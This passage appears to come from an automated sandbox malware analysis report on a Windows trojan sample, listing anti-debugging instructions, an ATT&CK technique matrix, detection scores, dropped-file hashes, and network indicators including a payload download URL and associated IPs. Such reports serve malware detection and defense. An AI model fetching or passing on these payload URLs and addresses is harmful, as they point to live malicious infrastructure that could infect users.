      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D8399D6 mov ecx, dword ptr fs:[00000030h]5_2_1D8399D6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C5921 mov eax, dword ptr fs:[00000030h]5_2_1D7C5921
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C5921 mov ecx, dword ptr fs:[00000030h]5_2_1D7C5921
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C5921 mov eax, dword ptr fs:[00000030h]5_2_1D7C5921
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C5921 mov eax, dword ptr fs:[00000030h]5_2_1D7C5921
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C2919 mov eax, dword ptr fs:[00000030h]5_2_1D7C2919
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C2919 mov eax, dword ptr fs:[00000030h]5_2_1D7C2919
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7E6912 mov eax, dword ptr fs:[00000030h]5_2_1D7E6912
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D787917 mov eax, dword ptr fs:[00000030h]5_2_1D787917
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BB9FA mov eax, dword ptr fs:[00000030h]5_2_1D7BB9FA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7899F0 mov ecx, dword ptr fs:[00000030h]5_2_1D7899F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7909F0 mov eax, dword ptr fs:[00000030h]5_2_1D7909F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C49F0 mov eax, dword ptr fs:[00000030h]5_2_1D7C49F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C49F0 mov eax, dword ptr fs:[00000030h]5_2_1D7C49F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80C920 mov ecx, dword ptr fs:[00000030h]5_2_1D80C920
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80C920 mov eax, dword ptr fs:[00000030h]5_2_1D80C920
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80C920 mov eax, dword ptr fs:[00000030h]5_2_1D80C920
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80C920 mov eax, dword ptr fs:[00000030h]5_2_1D80C920
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D85892E mov eax, dword ptr fs:[00000030h]5_2_1D85892E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D85892E mov eax, dword ptr fs:[00000030h]5_2_1D85892E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D86492D mov eax, dword ptr fs:[00000030h]5_2_1D86492D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D825930 mov eax, dword ptr fs:[00000030h]5_2_1D825930
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D825930 mov eax, dword ptr fs:[00000030h]5_2_1D825930
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D825930 mov eax, dword ptr fs:[00000030h]5_2_1D825930
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D825930 mov ecx, dword ptr fs:[00000030h]5_2_1D825930
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BD9CE mov eax, dword ptr fs:[00000030h]5_2_1D7BD9CE
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79B9C0 mov eax, dword ptr fs:[00000030h]5_2_1D79B9C0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79B9C0 mov eax, dword ptr fs:[00000030h]5_2_1D79B9C0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7989C0 mov eax, dword ptr fs:[00000030h]5_2_1D7989C0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7989C0 mov eax, dword ptr fs:[00000030h]5_2_1D7989C0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D85D946 mov eax, dword ptr fs:[00000030h]5_2_1D85D946
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D84D947 mov eax, dword ptr fs:[00000030h]5_2_1D84D947
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78B9B0 mov eax, dword ptr fs:[00000030h]5_2_1D78B9B0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C89B0 mov edx, dword ptr fs:[00000030h]5_2_1D7C89B0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79E9A0 mov eax, dword ptr fs:[00000030h]5_2_1D79E9A0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79E9A0 mov eax, dword ptr fs:[00000030h]5_2_1D79E9A0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79E9A0 mov eax, dword ptr fs:[00000030h]5_2_1D79E9A0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79E9A0 mov eax, dword ptr fs:[00000030h]5_2_1D79E9A0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79E9A0 mov eax, dword ptr fs:[00000030h]5_2_1D79E9A0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79E9A0 mov eax, dword ptr fs:[00000030h]5_2_1D79E9A0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79E9A0 mov eax, dword ptr fs:[00000030h]5_2_1D79E9A0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79E9A0 mov eax, dword ptr fs:[00000030h]5_2_1D79E9A0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79E9A0 mov eax, dword ptr fs:[00000030h]5_2_1D79E9A0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D81395B mov eax, dword ptr fs:[00000030h]5_2_1D81395B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D81395B mov eax, dword ptr fs:[00000030h]5_2_1D81395B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D81395B mov eax, dword ptr fs:[00000030h]5_2_1D81395B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7CC98F mov eax, dword ptr fs:[00000030h]5_2_1D7CC98F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7CC98F mov eax, dword ptr fs:[00000030h]5_2_1D7CC98F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7CC98F mov eax, dword ptr fs:[00000030h]5_2_1D7CC98F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79F870 mov eax, dword ptr fs:[00000030h]5_2_1D79F870
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79F870 mov eax, dword ptr fs:[00000030h]5_2_1D79F870
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A9870 mov eax, dword ptr fs:[00000030h]5_2_1D7A9870
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A9870 mov eax, dword ptr fs:[00000030h]5_2_1D7A9870
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D831889 mov eax, dword ptr fs:[00000030h]5_2_1D831889
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D831889 mov eax, dword ptr fs:[00000030h]5_2_1D831889
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D831889 mov eax, dword ptr fs:[00000030h]5_2_1D831889
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D81488F mov eax, dword ptr fs:[00000030h]5_2_1D81488F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D81B890 mov eax, dword ptr fs:[00000030h]5_2_1D81B890
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D81B890 mov eax, dword ptr fs:[00000030h]5_2_1D81B890
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D81B890 mov ecx, dword ptr fs:[00000030h]5_2_1D81B890
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D848890 mov eax, dword ptr fs:[00000030h]5_2_1D848890
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D848890 mov eax, dword ptr fs:[00000030h]5_2_1D848890
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D8198B2 mov eax, dword ptr fs:[00000030h]5_2_1D8198B2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BB839 mov eax, dword ptr fs:[00000030h]5_2_1D7BB839
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D8518DA mov eax, dword ptr fs:[00000030h]5_2_1D8518DA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D8518DA mov eax, dword ptr fs:[00000030h]5_2_1D8518DA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D8518DA mov eax, dword ptr fs:[00000030h]5_2_1D8518DA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D8518DA mov eax, dword ptr fs:[00000030h]5_2_1D8518DA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78D818 mov eax, dword ptr fs:[00000030h]5_2_1D78D818
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_03340888 LdrLoadDll,1_2_03340888
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040344A

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Native API      		1
      Registry Run Keys / Startup Folder      		1
      Access Token Manipulation      		11
      Virtualization/Sandbox Evasion      		OS Credential Dumping121
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		Exfiltration Over Other Network Medium1
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      System Shutdown/Reboot
      Default AccountsScheduled Task/Job1
      DLL Side-Loading      		11
      Process Injection      		1
      Access Token Manipulation      		LSASS Memory11
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Clipboard Data      		Exfiltration Over Bluetooth1
      Ingress Tool Transfer      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)1
      Registry Run Keys / Startup Folder      		11
      Process Injection      		Security Account Manager1
      Process Discovery      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)1
      DLL Side-Loading      		1
      Deobfuscate/Decode Files or Information      		NTDS2
      File and Directory Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer12
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information      		LSA Secrets4
      System Information Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      DLL Side-Loading      		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe29%VirustotalBrowse
      SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe20%ReversingLabsWin32.Trojan.Nemesis

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsg51C2.tmp\System.dll2%ReversingLabs
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\libgiognutls.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      www.giliro.com0%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
      http://www.giliro.com/wnioMvShFMvcw54.emz32w0%Avira URL Cloudsafe
      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
      http://www.giliro.com/wnioMvShFMvcw54.emz0%Avira URL Cloudsafe
      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%VirustotalBrowse
      http://www.giliro.com/wnioMvShFMvcw54.emzV0%Avira URL Cloudsafe
      http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
      http://www.giliro.com/wnioMvShFMvcw54.emzG0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      giliro.com
      		66.147.238.212
      		truefalse
        		unknown
        www.giliro.com
        		unknown
        		unknownfalseunknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://www.giliro.com/wnioMvShFMvcw54.emzfalse
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000001.39482313722.0000000000649000.00000008.00000001.01000000.00000005.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdSecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000001.39481928947.00000000005F2000.00000008.00000001.01000000.00000005.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdSecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000001.39481928947.00000000005F2000.00000008.00000001.01000000.00000005.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.giliro.com/wnioMvShFMvcw54.emz32wSecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000002.44176068670.000000000190C000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.Win32.Evo-gen.11060.2891.exefalse
          		high
          http://www.giliro.com/wnioMvShFMvcw54.emzVSecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000002.44176379660.0000000001936000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.giliro.com/wnioMvShFMvcw54.emzGSecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000002.44176379660.0000000001936000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDSecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000001.39482152594.0000000000626000.00000008.00000001.01000000.00000005.sdmpfalse
            		high
            http://www.gopher.ftp://ftp.SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000001.39482313722.0000000000649000.00000008.00000001.01000000.00000005.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000001.39482313722.0000000000649000.00000008.00000001.01000000.00000005.sdmpfalse
            • Avira URL Cloud: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            66.147.238.212
            		giliro.comUnited States
            		23535HOSTROCKETUSfalse

            General Information

            Joe Sandbox Version:36.0.0 Rainbow Opal
            Analysis ID:755965
            Start date and time:2022-11-29 11:43:57 +01:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 14m 38s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
            Run name:Suspected Instruction Hammering
            Number of analysed new started processes analysed:8
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal60.troj.evad.winEXE@3/4@1/1
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:
            • Successful, ratio: 45.5% (good quality ratio 43.8%)
            • Quality average: 77.4%
            • Quality standard deviation: 24.9%
            HCA Information:
            • Successful, ratio: 97%
            • Number of executed functions: 78
            • Number of non-executed functions: 182
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

            Warnings

            • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, wdcp.microsoft.com
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtSetInformationFile calls found.

            Simulations

            Behavior and APIs

            No simulations

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            HOSTROCKETUSLinux_amd64Get hashmaliciousBrowse
            • 216.120.232.36
            SecuriteInfo.com.Linux.Siggen.9999.1427.20017.elfGet hashmaliciousBrowse
            • 216.120.241.158
            BodjwSklVa.exeGet hashmaliciousBrowse
            • 66.147.225.95
            SecuriteInfo.com.Gen.Variant.Nemesis.10217.17747.5879.exeGet hashmaliciousBrowse
            • 66.147.238.174
            SecuriteInfo.com.Gen.Variant.Nemesis.10217.567.exeGet hashmaliciousBrowse
            • 66.147.238.174
            https://click.snapchat.com/aVHG?pid=snapchat_download_page&af_dp=...&af_web_dp=https://agroincome.com/standard/sense?manufacture=bWF4aW1lLmRlbm90QHNoaWZ0LXRlY2hub2xvZ3kuY29tGet hashmaliciousBrowse
            • 66.147.238.157
            https://click.snapchat.com/aVHG?pid=snapchat_download_page&af_dp=...&af_web_dp=https://agroincome.com/standard/sense?manufacture=bWF4aW1lLmRlbm90QHNoaWZ0LXRlY2hub2xvZ3kuY29tGet hashmaliciousBrowse
            • 66.147.238.157
            SecuriteInfo.com.NSIS.Injector.ASH.22601.exeGet hashmaliciousBrowse
            • 66.147.238.174
            6xfFjxyRXf.dllGet hashmaliciousBrowse
            • 216.120.236.62
            uVPWqAOMKn.dllGet hashmaliciousBrowse
            • 216.120.236.62
            payment copy.exeGet hashmaliciousBrowse
            • 66.147.239.119
            SecuriteInfo.com.W32.AIDetectNet.01.676.exeGet hashmaliciousBrowse
            • 66.147.239.119
            Scan copy of payment PDF.exeGet hashmaliciousBrowse
            • 66.147.239.119
            SecuriteInfo.com.Variant.Strictor.272916.28970.exeGet hashmaliciousBrowse
            • 66.147.239.119
            ktrkyRZyaU.dllGet hashmaliciousBrowse
            • 216.120.236.62
            h3CGwIXKW7.dllGet hashmaliciousBrowse
            • 216.120.236.62
            0xnQJ1y1YE.dllGet hashmaliciousBrowse
            • 216.120.236.62
            ntn3NlNh90.dllGet hashmaliciousBrowse
            • 216.120.236.62
            z0zJ7pAKCQ.dllGet hashmaliciousBrowse
            • 216.120.236.62
            SecuriteInfo.com.W32.AIDetectNet.01.25927.exeGet hashmaliciousBrowse
            • 66.147.239.119

            JA3 Fingerprints

            No context

            Dropped Files

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            C:\Users\user\AppData\Local\Temp\nsg51C2.tmp\System.dllACP-2210825ORDER.xlsGet hashmaliciousBrowse
              Services_Jingce_Quotation28112022.exeGet hashmaliciousBrowse
                Services_Jingce_Quotation28112022.exeGet hashmaliciousBrowse
                  98765434567890.exeGet hashmaliciousBrowse
                    98765434567890.exeGet hashmaliciousBrowse
                      ORI-0876543200987 (1).exeGet hashmaliciousBrowse
                        DC-098432345678909 (2).exeGet hashmaliciousBrowse
                          ORI-0876543200987 (1).exeGet hashmaliciousBrowse
                            DC-098432345678909 (2).exeGet hashmaliciousBrowse
                              https://repo.anaconda.com/miniconda/Miniconda3-py39_4.12.0-Windows-x86_64.exeGet hashmaliciousBrowse
                                uWoMvSzdog.exeGet hashmaliciousBrowse
                                  uWoMvSzdog.exeGet hashmaliciousBrowse
                                    RFQ.exeGet hashmaliciousBrowse
                                      RFQ.exeGet hashmaliciousBrowse
                                        21831nRdnc.exeGet hashmaliciousBrowse
                                          21831nRdnc.exeGet hashmaliciousBrowse
                                            RFQ1258966.xlsGet hashmaliciousBrowse
                                              Factura.exeGet hashmaliciousBrowse
                                                Factura.exeGet hashmaliciousBrowse

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Temp\nsg51C2.tmp\System.dll

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:modified
                                                  Size (bytes):11776
                                                  Entropy (8bit):5.656065698421856
                                                  Encrypted:false
                                                  SSDEEP:192:eY24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol+Sl:E8QIl975eXqlWBrz7YLOl+
                                                  MD5:17ED1C86BD67E78ADE4712BE48A7D2BD
                                                  SHA1:1CC9FE86D6D6030B4DAE45ECDDCE5907991C01A0
                                                  SHA-256:BD046E6497B304E4EA4AB102CAB2B1F94CE09BDE0EEBBA4C59942A732679E4EB
                                                  SHA-512:0CBED521E7D6D1F85977B3F7D3CA7AC34E1B5495B69FD8C7BFA1A846BAF53B0ECD06FE1AD02A3599082FFACAF8C71A3BB4E32DEC05F8E24859D736B828092CD5
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 2%
                                                  Joe Sandbox View:
                                                  • Filename: ACP-2210825ORDER.xls, Detection: malicious, Browse
                                                  • Filename: Services_Jingce_Quotation28112022.exe, Detection: malicious, Browse
                                                  • Filename: Services_Jingce_Quotation28112022.exe, Detection: malicious, Browse
                                                  • Filename: 98765434567890.exe, Detection: malicious, Browse
                                                  • Filename: 98765434567890.exe, Detection: malicious, Browse
                                                  • Filename: ORI-0876543200987 (1).exe, Detection: malicious, Browse
                                                  • Filename: DC-098432345678909 (2).exe, Detection: malicious, Browse
                                                  • Filename: ORI-0876543200987 (1).exe, Detection: malicious, Browse
                                                  • Filename: DC-098432345678909 (2).exe, Detection: malicious, Browse
                                                  • Filename: , Detection: malicious, Browse
                                                  • Filename: uWoMvSzdog.exe, Detection: malicious, Browse
                                                  • Filename: uWoMvSzdog.exe, Detection: malicious, Browse
                                                  • Filename: RFQ.exe, Detection: malicious, Browse
                                                  • Filename: RFQ.exe, Detection: malicious, Browse
                                                  • Filename: 21831nRdnc.exe, Detection: malicious, Browse
                                                  • Filename: 21831nRdnc.exe, Detection: malicious, Browse
                                                  • Filename: RFQ1258966.xls, Detection: malicious, Browse
                                                  • Filename: Factura.exe, Detection: malicious, Browse
                                                  • Filename: Factura.exe, Detection: malicious, Browse
                                                  Reputation:moderate, very likely benign file
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....MX...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

